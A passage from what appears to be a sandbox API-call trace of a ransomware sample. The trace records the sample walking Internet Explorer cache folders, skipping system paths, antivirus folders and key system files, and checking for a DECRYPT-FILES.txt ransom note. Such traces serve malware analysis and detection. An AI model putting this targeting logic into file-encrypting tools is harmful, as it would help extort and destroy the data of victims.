returned="65UX3YG0\\" [0180.595] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="65UX3YG0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\" [0180.595] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\Program Files") returned 0x0 [0180.595] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch=":\\Windows") returned 0x0 [0180.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\Games\\") returned 0x0 [0180.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\All Users") returned 0x0 [0180.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="AhnLab") returned 0x0 [0180.596] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.596] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\") returned 96 [0180.596] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.596] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\\\0a16c9.tmp") returned 107 [0180.596] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\65ux3yg0\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x284 [0180.597] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\") returned 96 [0180.597] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.597] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\\\DECRYPT-FILES.txt") returned 114 [0180.597] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\65ux3yg0\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.598] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\") returned 96 [0180.598] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\*" [0180.598] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xeec57aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec57aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0180.598] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.598] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xeec57aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec57aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.598] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.598] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.598] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeec57aa0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeec57aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec57aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.598] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.598] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.598] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.598] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.598] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.598] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.598] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.598] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.598] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.598] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.598] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.598] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.598] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.598] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.598] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.598] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\") returned 96 [0180.599] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.599] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\" [0180.599] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\0a16c9.tmp" [0180.599] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.599] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\65UX3YG0\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\65ux3yg0\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.599] CloseHandle (hObject=0x0) returned 0 [0180.599] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.599] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9b3900, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.599] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.599] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9b3900, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.599] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0180.599] CloseHandle (hObject=0x284) returned 1 [0180.600] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa9d9a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9d9a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AY721QDR", cAlternateFileName="")) returned 1 [0180.600] lstrcmpW (lpString1="AY721QDR", lpString2=".") returned 1 [0180.600] lstrcmpW (lpString1="AY721QDR", lpString2="..") returned 1 [0180.600] lstrcatW (in: lpString1="AY721QDR", lpString2="\\" | out: lpString1="AY721QDR\\") returned="AY721QDR\\" [0180.600] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\", lpString2="AY721QDR\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\" [0180.600] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\Program Files") returned 0x0 [0180.600] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch=":\\Windows") returned 0x0 [0180.600] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\Games\\") returned 0x0 [0180.600] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.600] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.600] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.600] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.600] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.600] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\All Users") returned 0x0 [0180.600] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.600] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.600] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.600] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="AhnLab") returned 0x0 [0180.600] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.600] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\") returned 96 [0180.600] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.600] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\\\0a16c9.tmp") returned 107 [0180.600] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\ay721qdr\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x284 [0180.603] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\") returned 96 [0180.603] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.603] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\\\DECRYPT-FILES.txt") returned 114 [0180.603] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\ay721qdr\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.603] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\") returned 96 [0180.603] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\*" [0180.603] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xeec57aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec57aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0180.604] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.604] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xeec57aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec57aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.604] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.604] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.604] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeec57aa0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeec57aa0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec57aa0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.604] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.604] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.604] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.604] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.604] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.604] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.604] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.604] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.604] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.604] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.604] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.604] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.604] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.604] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.604] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.604] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\") returned 96 [0180.604] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.604] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\" [0180.604] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\0a16c9.tmp" [0180.604] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.605] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\AY721QDR\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\ay721qdr\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.605] CloseHandle (hObject=0x0) returned 0 [0180.605] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.605] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9d9a60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9d9a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9d9a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.605] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.605] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9d9a60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9d9a60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9d9a60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.605] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0180.605] CloseHandle (hObject=0x284) returned 1 [0180.605] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa9b3900, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.605] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.605] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, 